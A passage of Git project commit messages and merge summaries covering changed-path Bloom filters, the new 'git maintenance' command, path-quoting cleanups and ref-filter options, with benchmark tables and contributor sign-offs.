Signed-off-by: Junio C Hamano <gitster@pobox.com>
Centralize reading of symlink destinations and the contents of regular
files that are too small to be streamed. This reduces code duplication
and allows future patches to add support for adding non-tracked files to
archives. The backends are expected to stream blobs if buffer is NULL.
object_file_to_archive() is only called from archive.c and thus no
longer exported.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git-p4 unshelve uses HEAD^$n to find the parent commit, which
fails if there is an additional commit.
Signed-off-by: Luke Diamand <luke@diamand.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be32() instead of open-coding it. This shortens the code
a bit and makes it easier to read.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unlike "git config --local", "git config --worktree" did not fail
early and cleanly when started outside a git repository.
* mt/config-fail-nongit-early:
config: complain about --worktree outside of a git repo
Allow maintainers to tweak $(TAR) invocations done while making
distribution tarballs.
* jc/dist-tarball-tweak:
Makefile: allow extra tweaking of distribution tarball
"git diff/show" on a change that involves a submodule used to read
the information on commits in the submodule from a wrong repository
and gave a wrong information when the commit-graph is involved.
* mf/submodule-summary-with-correct-repository:
submodule: use submodule repository when preparing summary
revision: use repository from rev_info when parsing commits
"git status --short" quoted a path with SP in it when tracked, but
not those that are untracked, ignored or unmerged. They are all
shown quoted consistently.
* jc/quote-path-cleanup:
quote: turn 'nodq' parameter into a set of flags
quote: rename misnamed sq_lookup[] to cq_lookup[]
wt-status: consistently quote paths in "status --short" output
quote_path: code clarification
quote_path: optionally allow quoting a path with SP in it
quote_path: give flags parameter to quote_path()
quote_path: rename quote_path_relative() to quote_path()
Optimization around submodule handling.
* os/collect-changed-submodules-optim:
submodule: suppress checking for file name and ref ambiguity for object ids
"git worktree add" learns that the "-d" is a synonym to "--detach"
option to create a new worktree without being on a branch.
* es/wt-add-detach:
git-worktree.txt: discuss branch-based vs. throwaway worktrees
worktree: teach `add` to recognize -d as shorthand for --detach
git-checkout.txt: document -d short option for --detach
The "add -i/-p" machinery has been written in C but it is not used
by default yet. It is made default to those who are participating
in feature.experimental experiment.
* jc/add-i-use-builtin-experimental:
add -i: use the built-in version when feature.experimental is set
A bit of API reshuffling to make sure stuff common to all backends
are not defined only in files backend.
* hn/refs-ref-log-only-bit:
refs: move REF_LOG_ONLY to refs-internal.h
Code cleanup.
* so/log-tree-diff-cleanup:
log_tree_diff: get rid of extra check for NULL
log_tree_diff: get rid of code duplication for first_parent_only
Misc cleanups.
* rs/misc-cleanups:
pack-bitmap-write: use hashwrite_be32() in write_hash_cache()
midx: use hashwrite_u8() in write_midx_header()
fast-import: use write_pack_header()
Change filters.txt to ref-reachability-filters.txt in order to avoid
squatting on a file name that might be useful for another purpose.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The internal reachable-filter API is a bit loose and imprecise; it
also bleeds unnecessarily into the public header. Tighten the API
by:
* renaming do_merge_filter() to reach_filter()
* separating parameters to explicitly identify what data is used
by the function instead of passing an entire ref_filter_cbdata
struct
* renaming and moving internal constants from header to source
file
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Introduce a configuration variable to specify a default value for the
recently-introduce '--max-new-filters' option of 'git commit-graph
write'.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Introduce a command-line flag to specify the maximum number of new Bloom
filters that a 'git commit-graph write' is willing to compute from
scratch.
Prior to this patch, a commit-graph write with '--changed-paths' would
compute Bloom filters for all selected commits which haven't already
been computed (i.e., by a previous commit-graph write with '--split'
such that a roll-up or replacement is performed).
This behavior can cause prohibitively-long commit-graph writes for a
variety of reasons:
* There may be lots of filters whose diffs take a long time to
generate (for example, they have close to the maximum number of
changes, diffing itself takes a long time, etc).
* Old-style commit-graphs (which encode filters with too many entries
as not having been computed at all) cause us to waste time
recomputing filters that appear to have not been computed only to
discover that they are too-large.
This can make the upper-bound of the time it takes for 'git commit-graph
write --changed-paths' to be rather unpredictable.
To make this command behave more predictably, introduce
'--max-new-filters=<n>' to allow computing at most '<n>' Bloom filters
from scratch. This lets "computing" already-known filters proceed
quickly, while bounding the number of slow tasks that Git is willing to
do.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the subsequent commit, additional options will be added to the
commit-graph API which have nothing to do with splitting.
Rename the 'split_commit_graph_opts' structure to the more-generic
'commit_graph_opts' to encompass both. Likewise, rename the 'flags'
member to instead be 'split_flags' to clarify that it only has to do
with the behavior implied by '--split'.
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a changed-path Bloom filter has either zero, or more than a
certain number (commonly 512) of entries, the commit-graph machinery
encodes it as "missing". More specifically, it sets the indices adjacent
in the BIDX chunk as equal to each other to indicate a "length 0"
filter; that is, that the filter occupies zero bytes on disk.
This has heretofore been fine, since the commit-graph machinery has no
need to care about these filters with too few or too many changed paths.
Both cases act like no filter has been generated at all, and so there is
no need to store them.
In a subsequent commit, however, the commit-graph machinery will learn
to only compute Bloom filters for some commits in the current
commit-graph layer. This is a change from the current implementation
which computes Bloom filters for all commits that are in the layer being
written. Critically for this patch, only computing some of the Bloom
filters means adding a third state for length 0 Bloom filters: zero
entries, too many entries, or "hasn't been computed".
It will be important for that future patch to distinguish between "not
representable" (i.e., zero or too-many changed paths), and "hasn't been
computed". In particular, we don't want to waste time recomputing
filters that have already been computed.
To that end, change how we store Bloom filters in the "computed but not
representable" category:
- Bloom filters with no entries are stored as a single byte with all
bits low (i.e., all queries to that Bloom filter will return
"definitely not")
- Bloom filters with too many entries are stored as a single byte with
all bits set high (i.e., all queries to that Bloom filter will
return "maybe").
These rules are sufficient to not incur a behavior change by changing
the on-disk representation of these two classes. Likewise, no
specification changes are necessary for the commit-graph format, either:
- Filters that were previously empty will be recomputed and stored
according to the new rules, and
- old clients reading filters generated by new clients will interpret
the filters correctly and be none the wiser to how they were
generated.
Clients will invoke the Bloom machinery in more cases than before, but
this can be addressed by returning a NULL filter when all bits are set
high. This can be addressed in a future patch.
Note that this does increase the size of on-disk commit-graphs, but far
less than other proposals. In particular, this is generally more
efficient than storing a bitmap for which commits haven't computed their
Bloom filters. Storing a bitmap incurs a penalty of one bit per commit,
whereas storing explicit filters as above incurs a penalty of one byte
per too-large or empty commit.
In practice, these boundary commits likely occupy a small proportion of
the overall number of commits, and so the size penalty is likely smaller
than storing a bitmap for all commits.
See, for example, these relative proportions of such boundary commits
(collected by SZEDER Gábor):
| Percentage of | commit-graph | |
| commits modifying | file size | |
├────────┬──────────────┼───────────────────┤ pct. |
| 0 path | >= 512 paths | before | after | change |
┌────────────────┼────────┼──────────────┼─────────┼─────────┼───────────┤
| android-base | 13.20% | 0.13% | 37.468M | 37.534M | +0.1741 % |
| cmssw | 0.15% | 0.23% | 17.118M | 17.119M | +0.0091 % |
| cpython | 3.07% | 0.01% | 7.967M | 7.971M | +0.0423 % |
| elasticsearch | 0.70% | 1.00% | 8.833M | 8.835M | +0.0128 % |
| gcc | 0.00% | 0.08% | 16.073M | 16.074M | +0.0030 % |
| gecko-dev | 0.14% | 0.64% | 59.868M | 59.874M | +0.0105 % |
| git | 0.11% | 0.02% | 3.895M | 3.895M | +0.0020 % |
| glibc | 0.02% | 0.10% | 3.555M | 3.555M | +0.0021 % |
| go | 0.00% | 0.07% | 3.186M | 3.186M | +0.0018 % |
| homebrew-cask | 0.40% | 0.02% | 7.035M | 7.035M | +0.0065 % |
| homebrew-core | 0.01% | 0.01% | 11.611M | 11.611M | +0.0002 % |
| jdk | 0.26% | 5.64% | 5.537M | 5.540M | +0.0590 % |
| linux | 0.01% | 0.51% | 63.735M | 63.740M | +0.0073 % |
| llvm-project | 0.12% | 0.03% | 25.515M | 25.516M | +0.0050 % |
| rails | 0.10% | 0.10% | 6.252M | 6.252M | +0.0027 % |
| rust | 0.07% | 0.17% | 9.364M | 9.364M | +0.0033 % |
| tensorflow | 0.09% | 1.02% | 7.009M | 7.010M | +0.0158 % |
| webkit | 0.05% | 0.31% | 17.405M | 17.406M | +0.0047 % |
(where the above increase is determined by computing a non-split
commit-graph before and after this patch).
Given that these projects are all "large" by commit count, the storage
cost by writing these filters explicitly is negligible. In the most
extreme example, android-base (which has 494,848 commits at the time of
writing) would have its commit-graph increase by a modest 68.4 KB.
Finally, a test to exercise filters which contain too many changed path
entries will be introduced in a subsequent patch.
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Suggested-by: Jakub Narębski <jnareb@gmail.com>
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The completion for format-patch currently suggests --base=, --interdiff=
and --range-diff= as options. However, with these `=` forms of the
options, there is no space and we'd enter the `--*` case which means we
don't call the __git_complete_revlist() at the end.
Teach _git_format_patch() to complete refs in the case of --base=,
--interdiff= and --range-diff=.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Suppress the message 'origin/HEAD set to master' in case of an error.
$ git remote set-head origin -a
error: Not a valid ref: refs/remotes/origin/master
origin/HEAD set to master
Signed-off-by: Christian Schlack <christian@backhub.co>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The approximate_object_count() function tries to compute the count only
once per process. But ever since it was introduced in 8e3f52d778
(find_unique_abbrev: move logic out of get_short_sha1(), 2016-10-03), we
failed to actually set the "valid" flag, meaning we'd compute it fresh
on every call.
This turns out not to be _too_ bad, because we're only iterating through
the packed_git list, and not making any system calls. But since it may
get called for every abbreviated hash we output, even this can add up if
you have many packs.
Here are before-and-after timings for a new perf test which just asks
rev-list to abbreviate each commit hash (the test repo is linux.git,
with commit-graphs):
Test origin HEAD
----------------------------------------------------------------------------
5303.3: rev-list (1) 28.91(28.46+0.44) 29.03(28.65+0.38) +0.4%
5303.4: abbrev-commit (1) 1.18(1.06+0.11) 1.17(1.02+0.14) -0.8%
5303.7: rev-list (50) 28.95(28.56+0.38) 29.50(29.17+0.32) +1.9%
5303.8: abbrev-commit (50) 3.67(3.56+0.10) 3.57(3.42+0.15) -2.7%
5303.11: rev-list (1000) 30.34(29.89+0.43) 30.82(30.35+0.46) +1.6%
5303.12: abbrev-commit (1000) 86.82(86.52+0.29) 77.82(77.59+0.22) -10.4%
5303.15: load 10,000 packs 0.08(0.02+0.05) 0.08(0.02+0.06) +0.0%
It doesn't help at all when we have 1 pack (5303.4), but we get a 10%
speedup when there are 1000 packs (5303.12). That's a modest speedup for
a case that's already slow and we'd hope to avoid in general (note how
slow it is even after, because we have to look in each of those packs
for abbreviations). But it's a one-line change that clearly matches the
original intent, so it seems worth doing.
The included perf test may also be useful for keeping an eye on any
regressions in the overall abbreviation code.
Reported-by: Rasmus Villemoes <rv@rasmusvillemoes.dk>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of writing a new commit-graph in every 'git maintenance run
--auto' process (when maintenance.commit-graph.enalbed is configured to
be true), only write when there are "enough" commits not in a
commit-graph file.
This count is controlled by the maintenance.commit-graph.auto config
option.
To compute the count, use a depth-first search starting at each ref, and
leaving markers using the SEEN flag. If this count reaches the limit,
then terminate early and start the task. Otherwise, this operation will
peel every ref and parse the commit it points to. If these are all in
the commit-graph, then this is typically a very fast operation. Users
with many refs might feel a slow-down, and hence could consider updating
their limit to be very small. A negative value will force the step to
run every time.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance run' command has an '--auto' option. This is used
by other Git commands such as 'git commit' or 'git fetch' to check if
maintenance should be run after adding data to the repository.
Previously, this --auto option was only used to add the argument to the
'git gc' command as part of the 'gc' task. We will be expanding the
other tasks to perform a check to see if they should do work as part of
the --auto flag, when they are enabled by config.
First, update the 'gc' task to perform the auto check inside the
maintenance process. This prevents running an extra 'git gc --auto'
command when not needed. It also shows a model for other tasks.
Second, use the 'auto_condition' function pointer as a signal for
whether we enable the maintenance task under '--auto'. For instance, we
do not want to enable the 'fetch' task in '--auto' mode, so that
function pointer will remain NULL.
Now that we are not automatically calling 'git gc', a test in
t5514-fetch-multiple.sh must be changed to watch for 'git maintenance'
instead.
We continue to pass the '--auto' option to the 'git gc' command when
necessary, because of the gc.autoDetach config option changes behavior.
Likely, we will want to absorb the daemonizing behavior implied by
gc.autoDetach as a maintenance.autoDetach config option.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, a normal run of "git maintenance run" will only run the 'gc'
task, as it is the only one enabled. This is mostly for backwards-
compatible reasons since "git maintenance run --auto" commands replaced
previous "git gc --auto" commands after some Git processes. Users could
manually run specific maintenance tasks by calling "git maintenance run
--task=<task>" directly.
Allow users to customize which steps are run automatically using config.
The 'maintenance.<task>.enabled' option then can turn on these other
tasks (or turn off the 'gc' task).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Performing maintenance on a Git repository involves writing data to the
.git directory, which is not safe to do with multiple writers attempting
the same operation. Ensure that only one 'git maintenance' process is
running at a time by holding a file-based lock. Simply the presence of
the .git/maintenance.lock file will prevent future maintenance. This
lock is never committed, since it does not represent meaningful data.
Instead, it is only a placeholder.
If the lock file already exists, then no maintenance tasks are
attempted. This will become very important later when we implement the
'prefetch' task, as this is our stop-gap from creating a recursive process
loop between 'git fetch' and 'git maintenance run --auto'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A user may want to only run certain maintenance tasks in a certain
order. Add the --task=<task> option, which allows a user to specify an
ordered list of tasks to run. These cannot be run multiple times,
however.
Here is where our array of maintenance_task pointers becomes critical.
We can sort the array of pointers based on the task order, but we do not
want to move the struct data itself in order to preserve the hashmap
references. We use the hashmap to match the --task=<task> arguments into
the task struct data.
Keep in mind that the 'enabled' member of the maintenance_task struct is
a placeholder for a future 'maintenance.<task>.enabled' config option.
Thus, we use the 'enabled' member to specify which tasks are run when
the user does not specify any --task=<task> arguments. The 'enabled'
member should be ignored if --task=<task> appears.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first new task in the 'git maintenance' builtin is the
'commit-graph' task. This updates the commit-graph file
incrementally with the command
git commit-graph write --reachable --split
By writing an incremental commit-graph file using the "--split"
option we minimize the disruption from this operation. The default
behavior is to merge layers until the new "top" layer is less than
half the size of the layer below. This provides quick writes most
of the time, with the longer writes following a power law
distribution.
Most importantly, concurrent Git processes only look at the
commit-graph-chain file for a very short amount of time, so they
will verly likely not be holding a handle to the file when we try
to replace it. (This only matters on Windows.)
If a concurrent process reads the old commit-graph-chain file, but
our job expires some of the .graph files before they can be read,
then those processes will see a warning message (but not fail).
This could be avoided by a future update to use the --expire-time
argument when writing the commit-graph.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In anticipation of implementing multiple maintenance tasks inside the
'maintenance' builtin, use a list of structs to describe the work to be
done.
The struct maintenance_task stores the name of the task (as given by a
future command-line argument) along with a function pointer to its
implementation and a boolean for whether the step is enabled.
A list these structs are initialized with the full list of implemented
tasks along with a default order. For now, this list only contains the
"gc" task. This task is also the only task enabled by default.
The run subcommand will return a nonzero exit code if any task fails.
However, it will attempt all tasks in its loop before returning with the
failure. Also each failed task will print an error message.
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The run_auto_gc() method is used in several places to trigger a check
for repo maintenance after some Git commands, such as 'git commit' or
'git fetch'.
To allow for extra customization of this maintenance activity, replace
the 'git gc --auto [--quiet]' call with one to 'git maintenance run
--auto [--quiet]'. As we extend the maintenance builtin with other
steps, users will be able to select different maintenance activities.
Rename run_auto_gc() to run_auto_maintenance() to be clearer what is
happening on this call, and to expose all callers in the current diff.
Rewrite the method to use a struct child_process to simplify the calls
slightly.
Since 'git fetch' already allows disabling the 'git gc --auto'
subprocess, add an equivalent option with a different name to be more
descriptive of the new behavior: '--[no-]maintenance'. Update the
documentation to include these options at the same time.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Maintenance activities are commonly used as steps in larger scripts.
Providing a '--quiet' option allows those scripts to be less noisy when
run on a terminal window. Turn this mode on by default when stderr is
not a terminal.
Pipe the option to the 'git gc' child process.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'gc' builtin is our current entrypoint for automatically maintaining
a repository. This one tool does many operations, such as repacking the
repository, packing refs, and rewriting the commit-graph file. The name
implies it performs "garbage collection" which means several different
things, and some users may not want to use this operation that rewrites
the entire object database.
Create a new 'maintenance' builtin that will become a more general-
purpose command. To start, it will only support the 'run' subcommand,
but will later expand to add subcommands for scheduling maintenance in
the background.
For now, the 'maintenance' builtin is a thin shim over the 'gc' builtin.
In fact, the only option is the '--auto' toggle, which is handed
directly to the 'gc' builtin. The current change is isolated to this
simple operation to prevent more interesting logic from being lost in
all of the boilerplate of adding a new builtin.
Use existing builtin/gc.c file because we want to share code between the
two builtins. It is possible that we will have 'maintenance' replace the
'gc' builtin entirely at some point, leaving 'git gc' as an alias for
some specific arguments to 'git maintenance run'.
Create a new test_subcommand helper that allows us to test if a certain
subcommand was run. It requires storing the GIT_TRACE2_EVENT logs in a
file. A negation mode is available that will be used in later tests.
Helped-by: Jonathan Nieder <jrnieder@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
difftool parses its own options and then passes the remaining options
onto diff. As a result, they share common command-line options. Instead
of duplicating the list, use a shared $__git_diff_difftool_options list.
The completion for diff is missing --relative and the completion for
difftool is missing --no-index. Add both of these to the common list.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The modern way to quote commands in the documentation is to use
backticks instead of double-quotes as this renders the text with the
code style. Convert double-quoted command text to backtick-quoted
commands. While we're at it, quote one instance of `^@`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The many `git diff` invocations have a `>tmp` redirection even though
the file is not being used afterwards. Remove these unnecessary
redirections.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit e3696980 (diff: halt tree-diff early after max_changes,
2020-03-30) intended to create a mechanism to short-circuit a diff
calculation after a certain number of paths were modified. By
incrementing a "num_changes" counter throughout the recursive
ll_diff_tree_paths(), this was supposed to match the number of changes
that would be written into the changed-path Bloom filters.
Unfortunately, this was not implemented correctly and instead misses
simple cases like file modifications. This then does not stop very
large changed-path filters from being written (unless they add or remove
many files).
To start, change the implementation in ll_diff_tree_paths() to instead
use the global diff_queue_diff struct's 'nr' member as the count. This
is a way to simplify the logic instead of making more mistakes in the
complicated diff code.
This has a drawback: the diff_queue_diff struct only lists the paths
corresponding to blob changes, not their leading directories. Thus,
get_or_compute_bloom_filter() needs an additional check to see if the
hashmap with the leading directories becomes too large.
One reason why this was not caught by test cases was that the test in
t4216-log-bloom.sh that was supposed to check this "too many changes"
condition only checked this on the initial commit of a repository. The
old logic counted these values correctly. Update this test in a few
ways:
1. Use GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS to reduce the limit,
allowing smaller commits to engage with this logic.
2. Create several interesting cases of edits, adds, removes, and mode
changes (in the second commit). By testing both sides of the
inequality with the *_MAX_CHANGED_PATHS variable, we can see that
the count is exactly correct, so none of these changes are missed
or over-counted.
3. Use the trace2 data value filter_found_large to verify that these
commits are on the correct side of the limit.
Another way to verify the behavior is correct is through performance
tests. By testing on my local copies of the Git repository and the Linux
kernel repository, I could measure the effect of these short-circuits
when computing a fresh commit-graph file with changed-path Bloom filters
using the command
GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS=N time \
git commit-graph write --reachable --changed-paths
and reporting the wall time and resulting commit-graph size.
For Git, the results are
| | N=1 | N=10 | N=512 |
|--------|----------------|----------------|----------------|
| HEAD~1 | 10.90s 9.18MB | 11.11s 9.34MB | 11.31s 9.35MB |
| HEAD | 9.21s 8.62MB | 11.11s 9.29MB | 11.29s 9.34MB |
For Linux, the results are
| | N=1 | N=20 | N=512 |
|--------|----------------|---------------|---------------|
| HEAD~1 | 61.28s 64.3MB | 76.9s 72.6MB | 77.6s 72.6MB |
| HEAD | 49.44s 56.3MB | 68.7s 65.9MB | 69.2s 65.9MB |
Naturally, the improvement becomes much less as the limit grows, as
fewer commits satisfy the short-circuit.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When 'get_or_compute_bloom_filter()' needs to compute a Bloom filter
from scratch, it looks to the default 'struct bloom_filter_settings' in
order to determine the maximum number of changed paths, number of bits
per entry, and so on.
All of these values have so far been constant, and so there was no need
to pass in a pointer from the caller (eg., the one that is stored in the
'struct write_commit_graph_context').
Start passing in a 'struct bloom_filter_settings *' instead of using the
default values to respect graph-specific settings (eg., in the case of
setting 'GIT_TEST_BLOOM_SETTINGS_MAX_CHANGED_PATHS').
In order to have an initialized value for these settings, move its
initialization to earlier in the commit-graph write.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'get_bloom_filter' takes a flag to control whether it will compute a
Bloom filter if the requested one is missing. In the next patch, we'll
add yet another parameter to this method, which would force all but one
caller to specify an extra 'NULL' parameter at the end.
Instead of doing this, split 'get_bloom_filter' into two functions:
'get_bloom_filter' and 'get_or_compute_bloom_filter'. The former only
looks up a Bloom filter (and does not compute one if it's missing,
thus dropping the 'compute_if_not_present' flag). The latter does
compute missing Bloom filters, with an additional parameter to store
whether or not it needed to do so.
This simplifies many call-sites, since the majority of existing callers
to 'get_bloom_filter' do not want missing Bloom filters to be computed
(so they can drop the parameter entirely and use the simpler version of
the function).
While we're at it, instrument the new 'get_or_compute_bloom_filter()'
with counters in the 'write_commit_graph_context' struct which store
the number of filters that we did and didn't compute, as well as filters
that were truncated.
It would be nice to drop the 'compute_if_not_present' flag entirely,
since all remaining callers of 'get_or_compute_bloom_filter' pass it as
'1', but this will change in a future patch and hence cannot be removed.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For now, we assume that there is a fixed constant describing the
maximum number of changed paths we are willing to store in a Bloom
filter.
Prepare for that to (at least partially) not be the case by making it a
member of the 'struct bloom_filter_settings'. This will be helpful in
the subsequent patches by reducing the size of test cases that exercise
storing too many changed paths, as well as preparing for an eventual
future in which this value might change.
This patch alone does not cause newly generated Bloom filters to use
a custom upper-bound on the maximum number of changed paths a single
Bloom filter can hold, that will occur in a later patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make the mergetool used with "meld" backend behave similarly to "vimdiff" by
telling it to auto-merge non-conflicting parts and highlight the conflicting
parts when `mergetool.meld.useAutoMerge` is configured with `true`, or `auto`
for detecting the `--auto-merge` option automatically.
Helped-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Helped-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Lin Sun <lin.sun@zoom.us>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Amend a comment in the test.config file to point to the latest
upstream version, which makes it easier for the user to tweak this.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the link to the canonical one, the old link redirects to the
new one.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Enable ref-filter to process multiple merged and no-merged filters, and
extend functionality to git branch, git tag and git for-each-ref. This
provides an easy way to check for branches that are "graduation
candidates:"
$ git branch --no-merged master --merged next
If passed more than one merged (or more than one no-merged) filter, refs
must be reachable from any one of the merged commits, and reachable from
none of the no-merged commits.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update documentation for "git branch", "git for-each-ref" and "git tag"
with notes explaining what happens when passed multiple --contains or
--no-contains filters.
This behavior is useful to document prior to enabling multiple
merged/no-merged filters, in order to demonstrate consistent behavior
between merged/no-merged and contains/no-contains filters.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests covering the behavior of passing multiple contains/no-contains
filters to git branch, e.g.:
$ git branch --contains feature_a --contains feature_b
$ git branch --no-contains feature_a --no-contains feature_b
When passed more than one contains (or no-contains) filter, the tips of
the branches returned must be reachable from any of the contains commits
and from none of the the no-contains commits.
This logic is useful to describe prior to enabling multiple
merged/no-merged filters, so that future tests will demonstrate
consistent behavior between merged/no-merged and contains/no-contains
filters.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The correct value from commit-graph.c:
#define GRAPH_PARENT_NONE 0x70000000
Signed-off-by: Conor Davis <git@conor.fastmail.fm>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options indicate user intent for the whole fetch operation, and
ignoring them in sub-fetches (i.e. "--all" and recursive fetching of
submodules) is quite unexpected when, for instance, it is intended
to limit all of the communication to a specific transport protocol
for some reason.
Signed-off-by: Alex Riesen <alexander.riesen@cetitec.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
quote_c_style() and its friend quote_two_c_style() both take an
optional "please omit the double quotes around the quoted body"
parameter. Turn it into a flag word, assign one bit out of it,
and call it CQUOTE_NODQ bit.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This table is used to see if each byte needs quoting when responding
to a request to C-quote the string, not quoting with single-quote in
the shell style. Similarly, sq_must_quote() is fed each byte from
the string being C-quoted.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Tracked paths with SP in them were cquoted in "git status --short"
output, but untracked, ignored, and unmerged paths weren't.
The test was stolen from a patch to fix output for the 'untracked'
paths by brian m. carlson, with similar tests added for 'ignored'
ones.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The implementation we moved from wt-status to enclose a pathname
that has a SP in it inside a dq-pair is a bit convoluted. It lets
quote_c_style_counted() do its escaping and then
(1) if the input string got escaped, which is checked by seeing if
the result begins with a double-quote, declare that we are
done. If there wasn't any SP in the input, that is OK, and if
there was, the result is quoted already so it is OK, too.
(2) if the input string did not get escaped, and the result has SP
in it, enclose the whole thing in a dq-pair ourselves.
Instead we can scan the path upfront to see if the input has SP in
it. If so, we tell quote_c_style_counted() not to enclose its
output in a dq-pair, and we add a dq-pair ourselves. Whether the
input had bytes that quote_c_style_counted() uses backslash quoting,
this would give us a desired quoted string. If the input does not
have SP in it, we just let quote_c_style_counted() do its thing as
usual, which would enclose the result in a dq-pair only when needed.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some code in wt-status.c special case a path with SP in it, which
usually does not have to be c-quoted, and ensure that such a path
does get quoted. Move the logic to quote_path() and give it a bit
in the flags word, QUOTE_PATH_QUOTE_SP.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The quote_path() function computes a path (relative to its base
directory) and c-quotes the result if necessary. Teach it to take a
flags parameter to allow its behaviour to be enriched later.
No behaviour change intended.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is no quote_path_absolute() or anything that causes confusion,
and one of the two large consumers already rename the long name
locally with a preprocessor macro.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
tr(1) of ANSI/POSIX environment, aka APE, don't support \n literal.
It's handles only octal(\ooo) or hexadecimal(\xhhhh) numbers.
And its sed(1)'s label is limited to maximum seven characters.
Therefore I replaced some labels to drop a character.
* close -> cl
* continue -> cont (cnt is used for count)
* line -> ln
* hered -> hdoc
* shell -> sh
* string -> str
Signed-off-by: Kyohei Kadota <lufia@lufia.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix build procedure for MSVC.
* os/vcbuild:
contrib/buildsystems: fix expat library name for generated vcxproj
vcbuild: fix batch file name in README
vcbuild: fix library name for expat with make MSVC=1
"git status" has trouble showing where it came from by interpreting
reflog entries that recordcertain events, e.g. "checkout @{u}", and
gives a hard/fatal error. Even though it inherently is impossible
to give a correct answer because the reflog entries lose some
information (e.g. "@{u}" does not record what branch the user was
on hence which branch 'the upstream' needs to be computed, and even
if the record were available, the relationship between branches may
have changed), at least hide the error to allow "status" show its
output.
* jt/interpret-branch-name-fallback:
wt-status: tolerate dangling marks
refs: move dwim_ref() to header file
sha1-name: replace unsigned int with option struct
The "--format=" option to the "for-each-ref" command and friends
